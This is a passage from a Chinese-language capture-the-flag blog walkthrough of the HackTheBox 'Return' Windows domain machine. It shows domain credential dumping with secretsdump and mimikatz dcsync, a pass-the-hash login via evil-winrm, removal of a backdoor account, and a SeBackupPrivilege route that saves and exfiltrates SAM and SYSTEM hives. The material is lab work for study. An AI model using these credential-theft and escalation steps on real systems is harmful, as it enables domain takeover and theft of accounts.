RETURN\PRINTER$:des-cbc-md5:85b02a0e25d3ae40
RETURN\PRINTER$:plain_password_hex:f343a0895418a7c18a3c35bb4bb62c258e321a07d901aecc29f172468d3c69bbb392a6d95961d8368aac6bf342ce28781812bdad9b9f913cf98b94b59e901c288ef8769c245a8446ed49c577c58e38379d0bd74366c95550330946105e365b1d0b798dab723e3411a9ad55561300930ecf5344c136aef88ef76f32ce8b9661ec04f612b7510fcb6321470db47eb1d71283db7ef9ffc0539297050ea63786792f04b7931ce7ada25e17ba8a7710f40f7b7010be398135e317a69f60291d9403a550983f84f3aebf4b0f36c114c528d43910fff484ede15d79834f55350e91c77b76c7cc124b0d66020c291563a700b10a
RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:2a2c8013b8be82cd6dfbd3603829fced:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM 
 0000   16 BD CA 34 21 A5 5C AD  51 ED B1 7E 4A 4F 59 B8   ...4!.\.Q..~JOY.
 0010   C3 65 1E 1A 5D 6D 97 82  79 3A 58 A0 FC 2B B5 8B   .e..]m..y:X..+..
 0020   A4 E2 9B CF DD 7B 52 80  99 33 45 4F F1 35 15 DC   .....{R..3EO.5..
 0030   4F 99 B3 A1 CB 55 21 A5  CC F5 27 43 F7 16 AA BC   O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
hacker:6601:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:2a2c8013b8be82cd6dfbd3603829fced:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
hacker:aes256-cts-hmac-sha1-96:3de68d74694bc5bb98300076dc1421b614d6cdac92bf32edef3db8d04c53cd78
hacker:aes128-cts-hmac-sha1-96:a65c3c4ae658ad47908f773b06dcaff8
hacker:des-cbc-md5:3bc123622a52c7dc
PRINTER$:aes256-cts-hmac-sha1-96:f1742d1b78c89a9d083c26369dc2c4259239801f940a8cacc9055bac5cdfba4d
PRINTER$:aes128-cts-hmac-sha1-96:46efbc5c55b316fe2d33d207fbecc859
PRINTER$:des-cbc-md5:c1ecab8fa8ea8fba
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f53ce9b7740>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f53ce9b7740>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

我们成功抓取到了域中成员所有的哈希

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.217.15 -u Administrator -H 32db622ed9c00dd1039d8288b0407460
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
return\administrator

记得删掉后门账号

1
2
3

C:\Users\Administrator\Desktop>net user hacker /del /domain
net user hacker /del /domain
The command completed successfully.

如果不想加账号，还可以用Mimikatzz抓取管理员哈希

mimikatz # lsadump::dcsync /domain:return.local /user:Administrator
[DC] 'return.local' will be the domain
[DC] 'printer.return.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 7/16/2021 7:03:22 AM
Object Security ID   : S-1-5-21-3750359090-2939318659-876128439-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 32db622ed9c00dd1039d8288b0407460
    ntlm- 0: 32db622ed9c00dd1039d8288b0407460
    ntlm- 1: 4c3e0997511a76643796c05ec063a4cd
    ntlm- 2: 9307ee5abf7791f3424d9d5148b20177
    lm  - 0: e62e965d90b480e63ead2fb35e0ed021
    lm  - 1: 9d430c68ed289de735133e92abaf338b

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 63043f578ffb1fcb7fa3ab8fd93e9e04

* Primary:Kerberos-Newer-Keys *
    Default Salt : RETURN.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
      aes128_hmac       (4096) : ef8673c4ba668752432c817dda62af48
      des_cbc_md5       (4096) : 4f0ee6291aabd338
    OldCredentials
      aes256_hmac       (4096) : 1faded14e2c0c28e9f5909d983fa7952fc17fa2070ab887279e4bc42bd33b16b
      aes128_hmac       (4096) : ebdb065faae061ac8d87b51a61083ef8
      des_cbc_md5       (4096) : 4ffb0df483a1ae51
    OlderCredentials
      aes256_hmac       (4096) : e1ff2edb6ac2d49b1da85c90bed5146e24a9f59415266fe64bd7dfe89349d8fb
      aes128_hmac       (4096) : 672fdcafc23ad22ac58d9c060671d95d
      des_cbc_md5       (4096) : 15cefb73078a5eae

* Primary:Kerberos *
    Default Salt : RETURN.LOCALAdministrator
    Credentials
      des_cbc_md5       : 4f0ee6291aabd338
    OldCredentials
      des_cbc_md5       : 4ffb0df483a1ae51

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  0797b115cc2324cce88392a06ac4e284
    02  992e47cac4aa3b47ee723ebd669cf207
    03  8fdb31961a9b5bcd5db4ae60f9fb6257
    04  0797b115cc2324cce88392a06ac4e284
    05  6dddc0c623178fcd6e8bea8458bdba99
    06  d9edbe870f9346be84128ec5a3162ee6
    07  1b282205eb9e33deb217879d07d0b932
    08  3491410859d08fc09cf22773b4b4923a
    09  538a01f3e75e7728e7d24bc4dad7b530
    10  d6ec5a25b87f1adfd7ec5075500f128e
    11  7489e021b3817e10e6f3cdf40eef0ebb
    12  3491410859d08fc09cf22773b4b4923a
    13  b28fd605e6bd7504c95a73b4ec5214a2
    14  46bd660ab25cefa62d0be0827584aeae
    15  3747cc89e0b405cb11a26f319fdfeed9
    16  a73d18a151bbd26ee9e2bd2326d94b29
    17  0430b932e7d3eb18b7ef145a08f4afbb
    18  6193a72374c23557df4fff745c736310
    19  4b11a5dfa90e09d5690b6b4f66fbcf45
    20  00d872ff13ccc0771d4631796c89b3a1
    21  8a721283b23ac92d6d64127ab6e8178e
    22  504b8bcb63a12c9f25e7b654c5988551
    23  3ea9a60e4d353865b44d4a57c3aa14cc
    24  6f939637394f1bc07dd76839f7256f77
    25  9639a3391f41d92931cb59b63cc18f72
    26  aa163bb1a981f4cba3087adfcbd66bbe
    27  3005fe76504063855f9e8e183357630d
    28  fefedb2e54c148301966c135876b3c42
    29  a5a5361ea9c83770fc745f3bf6ccdf1e

7.替代提权路径：利用 SeBackupPrivilege 读取敏感文件

事后探查，发现我们还拥有SeBackupPrivilege

那么还有一种更简单的方式，就是直接用robocopy复制root.txt到我们的文件夹下

*Evil-WinRM* PS C:\Temp> robocopy /B C:\Users\Administrator\Desktop C:\Temp

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Wednesday, January 14, 2026 8:43:07 PM
   Source : C:\Users\Administrator\Desktop\
     Dest : C:\Temp\

    Files : *.*

  Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           2    C:\Users\Administrator\Desktop\
          *EXTRA File              45272        nc64.exe
            New File                 282        desktop.ini
  0%
100%
            New File                  34        root.txt
  0%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         2         2         0         0         0         1
   Bytes :       316       316         0         0         0    44.2 k
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00
   Ended : Wednesday, January 14, 2026 8:43:07 PM

*Evil-WinRM* PS C:\Temp> dir


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/14/2026   8:22 PM          45272 nc64.exe
-ar---        1/14/2026   6:18 PM             34 root.txt

我们甚至可以更进一步，直接备份sam和system文件。

*Evil-WinRM* PS C:\Temp> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Temp> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Temp> download sam
                                        
Info: Downloading C:\Temp\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
                                        
Info: Downloading C:\Temp\system to system
                                        
Info: Download successful!

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -sam sam -system system local 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

但是无法登录到管理员用户。导出的 SAM 和 SYSTEM 文件实际上只包含了本地账户的哈希。

域控制器的特殊性：DC 的核心数据库是 NTDS.dit，而不是 SAM。域用户（包括 Domain Admins）的哈希存储在 NTDS.dit 中。

SAM 里有什么？ 在 DC 上，SAM 文件通常只包含 DSRM（目录服务还原模式）的管理员密码，这个密码通常不能用于远程登录（WinRM/SMB），除非修改了注册表配置 (DsrmAdminLogonBehavior)。

正确的做法：利用 SeBackupPrivilege 时，除了 SAM/SYSTEM，你必须通过 VSS（卷影复制）或 diskshadow 提取 C:\Windows\NTDS\ntds.dit 文件。拿到 ntds.dit 和 system hive 后，才能解析出真正的域管理员哈希。

#windows

从零开始的windows生活-Return

http://example.com/2026/01/15/从零开始的windows生活-Return/

Author

Skyarrow

Posted on

January 15, 2026

Licensed under

HackTheBox-Browsed Previous

从零开始的windows生活-Timelapse Next